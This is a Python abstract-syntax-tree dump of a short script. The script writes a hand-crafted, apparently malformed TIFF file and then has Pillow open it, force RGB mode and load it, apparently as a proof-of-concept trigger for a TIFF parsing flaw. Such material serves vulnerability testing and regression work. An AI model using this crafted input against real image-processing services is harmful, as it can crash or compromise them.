Module(
    body=[
        Import(
            names=[
                alias(name='io')]),
        ImportFrom(
            module='PIL',
            names=[
                alias(name='Image')],
            level=0),
        With(
            items=[
                withitem(
                    context_expr=Call(
                        func=Name(id='open', ctx=Load()),
                        args=[
                            Constant(value='crafted_tiff.tif'),
                            Constant(value='wb')],
                        keywords=[]),
                    optional_vars=Name(id='f', ctx=Store()))],
            body=[
                Expr(
                    value=Call(
                        func=Attribute(
                            value=Name(id='f', ctx=Load()),
                            attr='write',
                            ctx=Load()),
                        args=[
                            Constant(value=b'II*\x00\x10\x00\x00\x00\x11\x00\x12\x00\x13\x00\x14\x00\x15\x00\x16\x00\x17\x00\x18\x00\x19\x00\x1a\x00')],
                        keywords=[]))]),
        With(
            items=[
                withitem(
                    context_expr=Call(
                        func=Attribute(
                            value=Name(id='Image', ctx=Load()),
                            attr='open',
                            ctx=Load()),
                        args=[
                            Constant(value='crafted_tiff.tif')],
                        keywords=[]),
                    optional_vars=Name(id='img', ctx=Store()))],
            body=[
                Assign(
                    targets=[
                        Attribute(
                            value=Name(id='img', ctx=Load()),
                            attr='mode',
                            ctx=Store())],
                    value=Constant(value='RGB')),
                Expr(
                    value=Call(
                        func=Attribute(
                            value=Name(id='img', ctx=Load()),
                            attr='load',
                            ctx=Load()),
                        args=[],
                        keywords=[]))])],
    type_ignores=[])